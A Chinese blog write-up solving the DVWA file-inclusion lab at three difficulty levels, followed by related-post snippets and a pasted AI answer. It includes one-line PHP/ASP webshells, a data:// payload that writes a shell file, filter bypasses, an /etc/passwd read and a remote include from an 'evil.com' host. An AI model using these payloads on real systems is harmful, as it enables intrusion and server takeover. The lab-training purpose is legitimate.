DVWA 文件包含

原创 已于 2023-01-29 17:17:32 修改
· 1k 阅读 · 2 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2023-01-08 11:32:00 首次发布

LOW:     

本地文件包含:

前置知识:

                        1.view help查看提示

                        2.view source查看源码

                        3."../"返回上一级路径

                        4.查看网页源代码

                        5."url/?page="文件包含

                        6."php://filter/read=convert.base64-encode/resource=*.*"php伪协议查看文件内容

writeup:

                        1.先view source查看文件资源,发现文件包含                

                        2.再view help,objective(目标):只用文件包含的方式从"../hackable/flags/fi.php"里找出五句名言。

                         3.先尝试点击那个路径,由于没有使用"?page=",而是直接访问了该地址,所以提示我们要用文件包含

 

                         4.尝试文件包含该路径,没有返回任何东西

                         5.考虑目标文件不在该目录下,尝试再返回一级目录,看到成功访问,并且有3个句子,应该是我们要的内容,那么还剩下的2句没找到

                         6.尝试查看页面源代码,第5句也找到了,还剩第3句

                          7.尝试用文件伪协议查看fi.php的源代码,返回的是base64加密的源代码,拿去解码得到的内容如下,找到第3句了。

 

远程文件包含:

前置知识:

        1)访问自己的服务器,在cmd使用"python -m http.server 端口号"开启http服务,使目标服务器能远程访问自己服务器。

        2)由于windows登入了微软账户所以此时目标服务器能访问自己服务器的根目录为"C:\Users\28033",在此目录下创建要包含的文件。

        3)webshell:一句话木马,将其上传到目标服务器上后能获得服务器更高权限

                1.常见一句话木马:

php: <?php @eval($_POST['pass']);?>
asp:   <%eval request ("pass")%>
aspx:  <%@ Page Language="Jscript"%<%eval(Request.Item["pass"],"unsafe");%>

                2.前提:php.ini里的safe_mode = off、 disable_functions = proc_open, popen, exec, system, shell_exec里的exec去掉 

        4)蚂剑:返回数据为空时可选择base64编码

writeup:                                 

        1.尝试能否远程文件包含,成功返回"hello"

        2.上传一句话木马,看见目标服务器访问成功,但网页没有返回任何东西,直接上蚂剑看看情况,找到目标文件了。

Medium:

远程文件包含:

前置知识:

        1.大小写绕过

        2.data://协议:"?xxx=data://text/plain,正文"将文本设置为纯文本格式(无格式),并在服务器上运行解析

        3.双写绕过:如果过滤只过滤一次,且过滤select为空字符则可以payload=selselectect,相当于sel select ect过滤后变成sel ect

writeup:

方法一:

        1.查看源码,发现对http://过滤,尝试大小写替换,然后再上传一句话木马即可

方法二:

        1.payload:data://text/plain,<?php fputs(fopen('shell5.php','w'),'<?php @eval($_POST[passwd]);?>');?>

        2.尝试payload,看到蚁剑连接成功

方法三:

        1.尝试payload:?page=htthttp://p://192.168.3.44:8000/33.txt

        2.或者尝试payload:?page=..././..././hackable/flags/fi.php

方法四: 

        1."../"被过滤所以尝试绝对路径

        2.payload:?page=php://filter/read=convert.base64-encode/resource=/var/www/html/hackable/flags/fi.php 

High:

前置知识:

        1.fnmatch函数:判断字符串匹配是否匹配,匹配则函数值返回1;通配符"*"可代表一到多个字符,例子,AEW*,查找以AEW开头的所有文件类型的文件,如AEWT.txt、AEWU.EXE、AEWI.dll

        2.file://协议:访问本地计算机的文件,用法"file:///绝对路径"

writeup:

        0.由于kali的DVWA错误不回显,作弊拿到了目标文件的绝对路径"/var/www/html/hackable/flags/fi.php"

        1.源码分析:要输入以"file"开头的payload

        2.payload:?page=file:///var/www/html/hackable/flags/fi.php

                           

文件包含漏洞(原理、挖掘与利用、DVWA 文件包含部分)
m0_61506558的博客
08-06 813
在bilibili里面底部的代码是不变的。包含内容包含页头、页脚包含函数 公共函数减少重复代码、便于维护1.2 问题可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞1.3 分类1.3.1 本地文件包含漏洞LFI目录遍历漏洞任意文件访问漏洞固定包含通过接口动态包含包含恶意代码或图片马包含敏感文件1.3.2 远程文件包含漏洞漏洞描述原因后果XXEXML外部实体注入使用XML参数数据,并且可以解析外部实体导致访问敏感文件、探测端口、执行系统命名SSRF。......
DVWA源代码
10-16
dvwa web漏洞演示平台代码,有需要的朋友可以下载
DVWA-文件包含(Include)模块 包括代码审计
weixin_45715461的博客
06-01 265
DVWA-文件包含(Include)模块 包括代码审计
dvwa篇之文件包含漏洞低、中、高三个级别的演示(小白必备!!!)
最新发布
qq_61426144的博客
04-07 796
简介:文件包含其初衷是应用于在后端脚本中把一些重复的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次进行编写,这种调用文件的过程一般被称为文件包含,其本身并没有什么危害,但是如果对包含的参数可控,那么在这一过程中就会产生文件包含漏洞,而文件包含又分为本地文件包含和远程文件包含
dvwa 源码分析(一) --- setup.php分析
weixin_34389926的博客
07-27 273
我们分析的第一个文件是setup.php,也是程序的安装文件。 &lt;?php define( 'DVWA_WEB_PAGE_TO_ROOT', '' ); require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php'; 我们把这个代码改为显示,在test.php中测试 &lt;?php ...
dvwa 源码分析(四) --- dvwaPhpIds.inc.php分析
weixin_34208283的博客
07-27 283
根据文件名就知道是IDS相关的 1 &lt;?php 2 3 if( !defined( 'DVWA_WEB_PAGE_TO_ROOT' ) ) { 4 define( 'DVWA System error- WEB_PAGE_TO_ROOT undefined' ); 5 exit; 6 } 7 8 define( 'DVWA_WEB_RO...
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版 需要的赶紧下载哦 最新吧 因外国网站连接失败的原因下载速度慢或者无法打开所以为你们提供的
DVWA靶场源码分享
12-11
学习使用,大家一起进步,此资源是为了无法在github上临时下载的同学分享,以备用,不需要积分,如果被调整了积分请联系UP主
dvwa文件包含漏洞
lusandong的博客
04-03 1018
dvwa,文件包含
dvwa文件包含
qq_52986156的博客
10-17 446
直接分析源码发现过滤方式是使用的替换函数str_replace过滤了http://和https://和相对路径的表示符号../替换为空字符串,此处可以双写绕过waf。本地:测试文件未在上层所以不影响直接使用,要是需要读取上层文件同理在使用../的时候插入成双写模式..././根据页面的三个文件点击可以发现后端是get方式用url栏的page传参也可以直接分析源码看到是未作任何过滤。对应的文件存放路径如下(前面是网络访问路径,后面是本地路径)然后我们构造其他不存在的文件有回显报错信息爆出文件路径。
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。...帮助web开发人员理解web应用保护的过程,还可以在课堂中为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA1.0.7汉化版源码.zip
11-02
安信华Web弱点演示系统基于知名WEB弱点测试系统DVWA1.0.7, 由独自等待汉化,ay暗影提供软件封装, 可能部分汉化不理想,大家可以给我反馈。 安信华web弱点演示系统基于DVWA1.0.7汉化而来,相对于原版本修改如下功能: 1、全界面汉化,包括介绍及相应的说明,更适合国内使用。 2、新增加不安全的验证码测试模块。 3、新增webservice代码执行。 4、增加每个项目的测试方法(低安全级别)。 5、修正不安全验证中密码更改失效问题。 6、解决原版中文乱码问题。 7、增加了暴力破解视频 8、修改命令执行代码中的错误,原版基于linux测试,汉化版则是在windows下面测试。
web网络安全系统搭建代码DVWA.zip
10-07
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,是一个web安全学习神器。本次针对DVWA进行简单部署。
DVWA漏洞教学源码
06-01
DVWA (Dam Vulnerable Web Application) DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序,自测无后门
DVWA靶场通关和源码分析
Aiwin的博客
02-09 1663
DVWA靶场全通关和源码分析
DVWA-Writeup
Yukikaze_cxy
05-30 589
待补完。。。SQL Injection目标:获取5个用户的用户名和密码=====【Low】思路:1正常,1'报错,根据错误提示发现服务器未过滤单引号,构造1' union select '1,提示列数不等,继续构造1' union select '1','2发现返回正常,若仍不对则继续构造'3','4'...直至正确返回。由于此题返回所有结果,故直接union select 1,table_nam...
DVWA-impossible难度源代码审计
2301_77744026的博客
06-10 642
这段php代码,通过表单提交的方式对ip地址进行ping命令执行。首先检查了token来防范跨站点请求伪造(CSRF)攻击,然后判断ip地址格式是否正确,有没有'/',避免注入攻击。接着将ip地址用'.'拆分并检查,检查他是否是整数数字(小数的话就是两部分了),是否是四个octet。如果是,那么他就是ip地址。则将ip地址重新组装。之后再确定操作系统,并对应执行ping命令,并将结果输出。 ​ 如果输入的 IP 地址不合法,则显示错误消息。代码还生成一个 session token 以防止 CSR
DVWA各个关卡源码分析
不想当脚本小子的脚本小子
12-19 2457
前一阵子做完DVWA靶场以后只是做了通关练习,现在将DVWA各个关卡的源码分析一下,有利于更好的理解漏洞的原理与攻防。我主要是分析一下源码,看看它为什么会有漏洞以及不同等级是如何防御的 SQL注入: 原理:SQL注入是指web应用程序对用户输入数据的合法行没有判断,前端传入后端的参数是可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。就是说前端的输入影响了后端的数据。 主要满足两个条件:1.参数用户可控。2.参数代入数据库查询 ...
DVWA文件上传源码分析
weixin_45689999的博客
12-01 780
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploa.
dvwa文件包含2
03-21
<think>嗯,用户想找DVWA文件包含漏洞第二关的解决方案或教程。首先,我需要回忆一下DVWA的结构。DVWA的不同关卡通常对应不同的安全级别,比如Low、Medium、High、Impossible。用户提到的是第二关,可能对应Medium级别。 文件包含漏洞通常分为本地文件包含(LFI)和远程文件包含(RFI)。在Medium级别,开发者可能会增加一些过滤,比如检查输入是否包含特定的协议或路径。比如,可能过滤掉“http://”或“https://”这样的字符串,防止远程文件包含。这时候,用户可能需要用其他方式绕过过滤,比如使用大小写混合、双写,或者使用其他协议如file://。 根据引用[2]中的内容,文件上传漏洞的防御措施包括白名单和黑名单,这可能和文件包含的过滤机制类似。例如,Medium级别可能使用黑名单来阻止某些协议,但可能存在被绕过的可能。比如,如果过滤了“http://”,但用户可以用“HtTp://”来绕过大小写检查,或者使用“http:/”或“http:\\”这样的变形。 另外,引用[3]提到了检查上传文件的类型,比如image/jpeg或image/png,这可能与文件包含无关,但说明DVWA中其他漏洞的防御措施可能类似,比如使用白名单过滤。不过对于文件包含来说,Medium级别可能只是部分过滤,而没有彻底解决问题。 用户需要解决方案,可能需要测试不同的输入方式。例如,在Medium级别,尝试使用相对路径或绝对路径进行本地文件包含。如果远程包含被过滤,可以尝试使用file协议读取本地文件,或者利用双写绕过过滤,比如输入“hthttp://tp://example.com”如果过滤替换了“http”为空,那么双写可能恢复成正确的URL。 此外,查看源码是关键。根据引用[1]中关于命令注入的源码分析,可以推测文件包含漏洞的源码可能也有类似的过滤逻辑。例如,替换“http://”为空字符串,这时候双写可以绕过。或者检查是否包含某些关键字,但没有处理大小写。 可能还需要考虑服务器配置,比如allow_url_include是否开启,这影响远程文件包含是否可行。在Medium级别,可能该选项被关闭,所以只能进行本地文件包含,但结合文件上传漏洞,上传一个恶意文件然后包含它,可能是一个方法。引用[2]中提到文件上传漏洞的防御,如果用户能上传文件,再通过文件包含执行,可能绕过一些限制。 总结解决方案步骤:首先查看页面参数,比如通过URL的page参数传入文件路径;然后尝试使用../进行路径遍历,查看是否被过滤;如果远程包含被过滤,尝试大小写、双写绕过;或者使用file协议读取本地文件。如果服务器配置不允许远程包含,可能需要结合上传功能,上传恶意文件后包含它。 最后,确保回答中引用相关引用内容,比如引用[2]和[1]中的过滤方法,说明如何绕过黑名单或替换策略。</think>### DVWA 文件包含漏洞(File Inclusion)第二关(Medium)解决方案 #### 漏洞分析 在DVWA的Medium级别文件包含漏洞中,开发者尝试通过过滤部分关键字(如`http://`、`https://`、`../`)来防御攻击,但过滤逻辑不完善,仍可通过以下方式绕过: 1. **路径遍历过滤绕过**:`../`被替换为空,但使用双写`..././`或大小写变形(如`..%2f`)可绕过[^2]。 2. **远程文件包含限制**:若服务器禁用`allow_url_include`,需结合本地文件包含漏洞或上传恶意文件后包含[^1]。 #### 具体步骤 1. **本地文件包含(LFI)** 尝试读取敏感文件(如`/etc/passwd`): ``` http://DVWA地址/vulnerabilities/fi/?page=file:///etc/passwd ``` 若过滤`../`,使用双写绕过: ``` http://DVWA地址/vulnerabilities/fi/?page=....//....//etc/passwd ``` 2. **远程文件包含(RFI)绕过** Medium级别可能过滤`http://`,尝试以下方法: - **大小写变形**:`hTtP://` 或 `HTTP://` - **协议缩写**:`//evil.com/shell.txt`(依赖服务器自动补全协议) - **使用其他协议**:`file://` 读取本地文件[^2]。 3. **结合文件上传漏洞** 若远程包含被完全禁用,可先上传恶意文件(如`.php`),再通过路径包含: ```php // 上传文件后包含 http://DVWA地址/vulnerabilities/fi/?page=./hackable/uploads/shell.php ``` #### 防御原理(源码分析) Medium级别的过滤代码如下: ```php $file = str_replace(array("http://", "https://", "../"), "", $file); ``` 该代码仅简单替换关键字,未递归处理或验证路径合法性,导致双写绕过[^1]。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QMDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值